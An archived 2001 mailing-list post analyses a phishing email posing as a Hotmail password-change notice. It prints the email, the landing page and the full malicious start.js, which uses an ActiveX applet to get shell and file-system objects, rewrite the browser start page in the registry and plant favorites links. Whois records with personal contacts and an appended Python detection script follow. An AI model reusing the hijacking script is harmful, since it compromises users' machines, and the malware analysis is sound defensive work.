Hotmail message malware

From: quentynat_private
Date: Fri Aug 10 2001 - 06:09:24 PDT


    There appears to be a new Hotmail malware thingy. It is sent from
    admin02at_private with the subject line of "Password Change".
    
    
    wonder how many people it will get before all the sites are closed?
    
    Detail - 
    
    I just received this mail from 202.104.122.157 [1]
    
    #START
    
    >From admin02at_private Thu, 09 Aug 2001 18:21:54 -0700
    Received: from [202.104.122.157] by hotmail.com (3.2) with ESMTP id
    MHotMailBD3C81DB0068400431DDCA687A9D0C810; Thu, 09 Aug 2001 18:20:28
    -0700
    Received: FROM html BY mail-server ; Fri Aug 10 09:17:50 2001 +0800
    From: admin02at_private
    To: ${MYEMAIL}@hotmail.com
    Subject: Password Change
    Date: Sat, 8 Sep 2001 08:13:32
    Mime-Version: 1.0
    Content-Type: text/html; charset="DEFAULT_CHARSET"
    X-Priority: 3
    X-MSMail-Priority: Normal
    X-Mailer: Microsoft Outlook Express 5.00.2919.6700
    X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700
    
    <HTML>
    
    <HEAD>
    
    </HEAD>
    
    <BODY TEXT="#000000" BGCOLOR="#336699" LINK="yellow" VLINK="#551A8B"
     ALINK="#FF0000">
    <P ALIGN="CENTER"><FONT SIZE="+3"><B>Password Change
    Confirmation</B></FONT>
    </P>
    <P ALIGN="CENTER"><FONT SIZE="+1"><B>Your Password has been successfully
    changed. Please remember your new Password. </B></FONT></P>
    <P ALIGN="CENTER"><FONT COLOR="#FFFF80"><A
    HREF="http://maeveshomepage.com/ty.htm">If you did not authorize this
    please
    click here to restore your old password.</A></FONT> </P>
    </BODY>
    </HTML>
    
    #END
    
    
    Now going to maeveshomepage.com/ty.htm [2] in Opera shows
    
    #START
    
    <!DOCTYPE HTML PUBLIC "-//SoftQuad//DTD HoTMetaL PRO
    5.0::19980907::extensions to HTML 4.0//EN" "hmpro5.dtd">
     
    <HTML>
     
    <HEAD>
    <TITLE></TITLE>
    </HEAD>
     
    <BODY BGCOLOR="#336699">
     <P ALIGN="CENTER"><FONT SIZE="+3"><B>Thank You</B></FONT> </P>
    <P ALIGN="CENTER"><FONT SIZE="+2">Your old password has been
    restored.</FONT> <SCRIPT SRC="start.js">
    </SCRIPT>
    </P>
    </BODY>
    </HTML>
    
    #END
    
    And looking at start.js (the interesting bit):
    
    #START
    
    document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>")
    function AddFavLnk(loc, DispName, SiteURL)
    {
        var Shor = Shl.CreateShortcut(loc + "\\" + DispName + ".URL");
        Shor.TargetPath = SiteURL;
        Shor.Save();
    }
    function f(){
        try
        {
            a1=document.applets[0];
            a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
            a1.createInstance();
            Shl = a1.GetObject();
            a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
            a1.createInstance();
            FSO = a1.GetObject();
            a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
            a1.createInstance();
            Net = a1.GetObject();
            try{
                var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
                document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
                /////////////////////////////////////////////////////////////////////////////// home page
                Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://yahhooo.devil.ru/");
                var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
                document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
                var WF, Shor, loc;
                WF = FSO.GetSpecialFolder(0);
                loc = WF + "\\Favorites";
                if(!FSO.FolderExists(loc))
                {
                    loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites";
                    if(!FSO.FolderExists(loc))
                    {
                        return;
                    }
                }
                /////////////////////////////////////////////////////////////////////////////// favorites
                AddFavLnk(loc, " Britney Spears Nude", "http://www.celebrities-revealed.com");
                AddFavLnk(loc, " Aol", "http://www.aol.com");
            }
            catch(e){ }
        }
        catch(e){ }
    }
    function init(){
        setTimeout("f()", 1000);
    }
    init();
    
    #END
    
    It appears to set your default home page to http://yahhooo.devil.ru/ [3]
    and get at your Favorites (which may contain saved usernames and passwords).
    
    anybody got anything further?
    
    Q
    
    Notes
    
    [1] - inetnum:     202.104.122.128 - 202.104.122.159
        netname:     SHENZHEN-JLXXCY-INFOR-LTD
        descr:       SHENZHEN JULINGXINXICHANYE INFORMATION CO.LTD
        country:     CN
        admin-c:     HB58-AP
        tech-c:      HB58-AP
        mnt-by:      MAINT-CHINANET-GD
        changed:     ipadmat_private 20000920
        source:      APNIC
    
        person:      HU BOG
        address:     F11,BUSSINESS NEWSPAPER OLYMPIC MANSION,SHENZHEN
        country:     CN
        phone:       +86-755-3521135
        fax-no:      +86-755-3396971
        e-mail:      ipuserat_private
        nic-hdl:     HB58-AP
        mnt-by:      MAINT-CHINANET-GD
        changed:     ipadmat_private 20000920
        source:      APNIC
    
    
    [2] - Registrant:
         JBO
         223 S. 5th
         usa, O ---
         US    
    
         Domain Name: MAEVESHOMEPAGE.COM
         
         Administrative Contact:
            I, TJ  bwestbyat_private
            223 S. 5th
            usa, O ---
            US    
            1115551212
    
         Technical Contact:
            I, TJ  bwestbyat_private
            223 S. 5th
            usa, O ---
            US    
            1115551212
    
         Billing Contact:
            I, TJ  bwestbyat_private
            223 S. 5th
            usa, O ---
            US    
            1115551212
    
    
         Record last updated on 11-Jul-2001.
         Record expires on 07-May-2002.
         Record Created on 07-May-2001.
    
         Domain servers in listed order:
            NS1.VEGASSECURE.NET   208.50.15.6
            NS2.VEGASSECURE.NET   208.50.15.7
    
    [3] - domain:  DEVIL.RU
        type:    CORPORATE
        admin-o: AK2000-RIPN
        nserver: ns.kravchenko.ru. 
        nserver: srvr.list.ru. 
        created: 07-AUG-2000
        state:   Delegated
        changed: 19-MAY-2001
        mnt-by:  ANDRIUSHA-MNT-RIPN
        source:  RIPN
    
    
        person:  Andrey S Kravchenko
        nic-hdl: AK2000-RIPN
        address: Teatralny st 23a/30,
        address: Donetsk, Ukraine, 340100
        phone:   +7 902 6010000
        fax-no:  +7 902 6010000
        e-mail:  andreyat_private
        changed: 18-AUG-2000
        mnt-by:  ANDRIUSHA-MNT-RIPN
        source:  RIPN
    
    
    -- 
    #####################
    Quentyn Taylor
    Sysadmin - Fotango
    #####################
    You're damn right we need a rational code of morality and ethics. But
    not much progress can
    be made in that direction while we've still got a majority ranting about
    gods, devils, souls, and
    absolute morality, and using an ancient book written by ignorant nomads
    as a guide.
    
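Added example, not part of the post above: a small Python triage script (my own, not the author's) that flags the pattern the post describes when run over a fetched script: the com.ms.activeX.ActiveXComponent bridge applet, setCLSID calls to the WScript.Shell / Scripting.FileSystemObject / WScript.Network CLSIDs quoted in start.js, and RegWrite / CreateShortcut calls that persist changes. The sample input is a constructed imitation of start.js with a placeholder URL, and the regexes are deliberately loose so whitespace variants still match.

```python
import re

# Constructed sample mirroring the shape of the start.js quoted in the post;
# the home-page URL is a placeholder rather than the one from the mail.
SAMPLE_JS = r'''
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>")
function f(){
  a1=document.applets[0];
  a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); a1.createInstance(); Shl = a1.GetObject();
  a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}"); a1.createInstance(); FSO = a1.GetObject();
  a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}"); a1.createInstance(); Net = a1.GetObject();
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://example.invalid/");
  var Shor = Shl.CreateShortcut(loc + "\\" + DispName + ".URL");
}
'''

# The CLSIDs passed to setCLSID are the standard WSH / scripting-runtime objects that,
# via the ActiveX bridge applet, give a web page shell, file-system and network access.
KNOWN_CLSIDS = {
    "{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}": "WScript.Shell",
    "{0D43FE01-F093-11CF-8940-00A0C9054228}": "Scripting.FileSystemObject",
    "{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}": "WScript.Network",
}
JS_STRING = r'"((?:[^"\\]|\\.)*)"'  # one double-quoted JS string literal, escapes allowed

def scan_script(js):
    """Static triage of a fetched script: which objects it reaches for and what it writes."""
    findings = {
        "activex_applet": bool(re.search(r'code\s*=\s*"?com\.ms\.activeX\.ActiveXComponent', js, re.I)),
        "clsids": [],
        "registry_writes": [],
        "creates_shortcut": bool(re.search(r'\.CreateShortcut\s*\(', js)),
    }
    for m in re.finditer(r'setCLSID\s*\(\s*"(\{[0-9A-Fa-f-]{36}\})"', js):
        clsid = m.group(1).upper()
        findings["clsids"].append((clsid, KNOWN_CLSIDS.get(clsid, "unknown")))
    for m in re.finditer(r'\.RegWrite\s*\(\s*' + JS_STRING + r'\s*,\s*' + JS_STRING, js):
        # Collapse the JS "\\" escapes so the key reads as it would in the registry.
        findings["registry_writes"].append((m.group(1).replace("\\\\", "\\"), m.group(2)))
    return findings

def verdict(findings):
    """'high' when the bridge applet, a known scripting object and a persistent write all appear."""
    known = any(name != "unknown" for _, name in findings["clsids"])
    writes = bool(findings["registry_writes"]) or findings["creates_shortcut"]
    if findings["activex_applet"] and known and writes:
        return "high"
    if findings["activex_applet"] or known:
        return "suspicious"
    return "none"
```

Running `verdict(scan_script(SAMPLE_JS))` on the constructed sample returns "high"; on a page that only loads the applet without any known CLSID it returns "suspicious", which is the right place to start asking the questions the post ends on.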



    This archive was generated by hypermail 2b30 : Fri Aug 10 2001 - 11:58:28 PDT